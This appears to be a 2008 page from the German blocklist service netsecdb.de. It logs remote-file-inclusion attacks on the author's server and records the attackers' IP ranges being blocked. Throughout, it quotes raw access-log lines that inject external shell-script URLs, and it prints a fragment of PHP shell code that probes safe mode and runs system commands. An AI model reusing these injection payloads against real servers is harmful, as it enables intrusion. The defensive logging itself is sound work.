netsecurity database

42.173.212.67.no-rdns.ord02.singlehop.net - - [25/Aug/2008:20:12:01 +0200] "GET //errors.php?error=http://trieves-tourisme.fr/ mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 6450 "-" "libwww-perl/5.811"

php-shell attack attempt with external url.

source-ip range and explot hoisting range gets blocked as hacker.
source:
67.212.173.42 US SINGLEHOP-S1-AWARDS-INC-COM NET-67-212-160-0-1 67.212.173.40 - 67.212.173.47 67.212.173.40/29 2008-03-06 SINGL-8

blocked as hacker

Destination:

81.137.209.202 GB BT-ADSL 81.137.192.0 - 81.137.215.255 81.137.192.0/19 2003-04-28 Single Static IP Addresses

tagged as hacker:

200.213.33.2 POLICLINICA MILITAR DE PORTO ALEGRE (16331) 200.213/16 200.213.33.0 - 200.213.33.63 200.213.33.0/26

tagged as hacker

80.154.35.22 DE TOIAG-ROOTSERVER-02 80.154.32.0 - 80.154.63.255 80.154.32.0/19 2005-05-23 T-Online International AG

tagged as hacker

Honestly, when writing the emails from today hinting on www.netsecdb.de i did not read heise security newsticker before.

If it's right what they report, the VOIP-System of
US-department for home security was hacked and during the weekend more than 400 calls were made to Asia and Middle East (costs about 12.000 US-Dollar).

80.190.200.171 DE PIRATENPARTEI-NET-DE DE-IP-PARTNER-20020717 80.190.200.168 - 80.190.200.175 80.190.200.168/29 2007-07-04 Piratenpartei Bayern
blocked as hackers

It offers services based on jondos to anyone. They sell the service to get their ROI:

Anonymisierungsserver of pirates party.

They state, that any lawsuite will get pubished on their website. So let's make it the other way round:

it's shurly a very trusted name:
vps.lateadultmovies.com

coming from:

69.73.155.242 US JAGUAR-TECHNOLOGIES-NOC NET-69-0-0-0-0 69.73.128.0 - 69.73.191.255 69.73.128.0/18 2003-11-05 JTL-8

blocked as hacker.

89.18.166.209 NL PCEXTREME 89.18.166.0 - 89.18.168.255 89.18.160.0/20 2005-10-03 PCextreme BV

blocked as hacker:

62.80.50.163 - - [06/Aug/2008:22:39:47 +0200] "GET /?q=http%3A%2F%2Fwww. boomerbible.com%2Finstapunk%2FMType%2Farchives%2Fajuq%2Fevuji%2F HTTP/1.0" 404 6095 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

218.75.5.212 CN HY-PEOPLE-GOVNMENT 218.75.5.208 - 218.75.5.215 218.75.5.208/29 2006-12-29 HuangYan People's Govnment

upgraded from spammer and sniffer to hacker - blocked:

Das gehört wohl zum sportlichen Alltag gewisser Leute:
Aug 18 23:55:35 courierpop3login: LOGIN FAILED, user=admin, ip=[::ffff:216.73.118.154]

Da ich diese Versuche (egal mit welchen Namen) nun mal nicht mag, gehört jetzt der entsprechende Netz-range ebenfalls zu den gesperrten. Und wird damit via netsecdb automatisch an die Nutzer dieses Dienstes weiterverbreitet.

Edit from Claus:
216.73.118.154 US OC-NET-3 NET-216-73-96-0-1 216.73.112.0 - 216.73.127.255 216.73.112.0/20 2002-10-07 OCHS
blocked as hacker @ request STATS-node CH

Guys - you should know me better from the past:

85.205.116.172 - - [29/Jul/2008:18:27:49 +0200] "GET /status HTTP/1.1" 404 6087 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"

tried by:

85.205.116.172 DE DE-ON-20050113 EU-ZZ-80-93 85.205.0.0 - 85.205.255.255 85.205.0.0/16 2005-01-13 Vodafone Group Services

such things only in ipsec from dedicated private ips.

net not tagged.

---------------------------------
bot.txt\?\?
---------------------------------
SysTrojan
Wrong Place

if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");

Clicking on one of the URLs in the articles about tries to hack the server triggers a hacking http-request to the server.

We assume that this never happens by mistake.

Result: Your network-range gets completely blocked and gets distributed to the partner-servers.

Claus

using a destination, someone already tried, gives no points - sorry.

if you run out of injection URL's, give http://dnsbl.abuse.ch/httpbl/injections.php a try.

the called scripts mostly want to know about the server env:

Error 403
www.netsecdb.de
Sun Aug 17 11:44:24 2008
Notepad/1.0.1 (typing)

and please remember: firewall rules based on netsecdb are generated :00 and :30 - and with it htaccess and iptables scripts for the external partners.

So hurry up, before time runs out.
You did read the netsecdb documentation - did you? rtfmf.

I already wrote, that 85.92.140.0/24 Flexwebhosting BV is blocked.

What sense does it make to request scripts from blocked nets?

provided by: 1&1 Internet Inc.

74.208.16.73 US CUSTOMERS-1 1AN1-NETWORK 74.208.0.0 - 74.208.63.255 74.208.0.0/18 2007-01-16 1 and 1 Internet Inc.

infong523.lxa.perfora.net - - [16/Aug/2008:22:54:31 +0200] "GET //errors.php?error=http:// www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 6095 "-" "libwww-perl/5.805"

but that was about a story with a car. this one is

provided by EuroAccess Enterprises Ltd:

85.12.15.28 NL NL-XENTRONIX 85.12.15.0 - 85.12.15.255 85.12.15.0/24 2006-11-08 Xentronix PA Assignment #4

77.221.130.5 RU DATAPOINT-NET2 RU-INFOBOX-20070330 77.221.128.0 - 77.221.143.255 77.221.128.0/20 2007-09-26 Colocation and virtual hosting

was already tagged as spammer and sniffer - 'upgraded'

srv005.infobox.ru - - [16/Aug/2008:17:50:28 +0200] "GET ///vwar/backup/errors.php?error=http:// biz4youhost.com//2.id.txt?? HTTP/1.1" 404 6095 "-" "libwww-perl/5.803"
srv005.infobox.ru - - [16/Aug/2008:17:50:29 +0200] "GET /?q=node///vwar/backup/errors.php?error=http:// biz4youhost.com//2.id.txt?? HTTP/1.1" 404 6202 "-" "libwww-perl/5.803"

nslookup biz4youhost.com

rachel.web-dns1.com - - [16/Aug/2008:19:34:11 +0200] "GET /?q=node///vwar/backup/errors.php?error=http:// matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 6216 "-" "libwww-perl/5.812"
rachel.web-dns1.com - - [16/Aug/2008:19:34:11 +0200] "GET /?q=node/79///vwar/backup/errors.php?error=http:// matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 200 11544 "-" "libwww-perl/5.812"

69.61.106.55 US TRUSTED-IP-NETWORKS-69-61-106-0-24 NET-69-61-0-0-1 69.61.106.0 - 69.61.106.255 69.61.106.0/24

cidrcheck 2008-04-21 TIPNE

already blocked.

nslookup matrix-computers.net

80.50.70.78 PL MAN-KRAKOW-AR2 80.50.70.0 - 80.50.70.255 80.50.70.0/24 2005-04-14 Man Krakow kra_ar2 (zlote port

provided by: TP S.A.

do-gorlice.net.tpnet.pl - - [16/Aug/2008:19:18:22 +0200] "GET /?mosConfig_absolute_path=http:// www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 200 50705 "-" "libwww-perl/5.803"
do-gorlice.net.tpnet.pl - - [16/Aug/2008:19:18:24 +0200] "GET /?q=node/?mosConfig_absolute_path=http:// www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 6202 "-" "libwww-perl/5.803"

nominated itself as hacker-net - confirmed.

nslookup www.degeheimedienst.nl

Non-authoritative answer:
Name: www.degeheimedienst.nl
Address: 85.92.140.140

85.92.140.140 NL Flexwebhosting 85.92.140.0 - 85.92.140.255 85.92.140.0/24 2006-03-02 Flexwebhosting BV

added to blocked netranges.

P.S.: as pointed out several times before, external URLs don't work on our servers for exploits:

printunion.ru - - [16/Aug/2008:17:53:57 +0200] "GET //errors.php?error=http:// www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 6095 "-" "libwww-perl/5.805"
printunion.ru - - [16/Aug/2008:17:55:25 +0200] "GET /?q=node//errors.php?error=http:// www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 6218 "-" "libwww-perl/5.805"
printunion.ru - - [16/Aug/2008:17:55:25 +0200] "GET /?q=node/79//errors.php?error=http:// www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 200 11520 "-" "libwww-perl/5.805"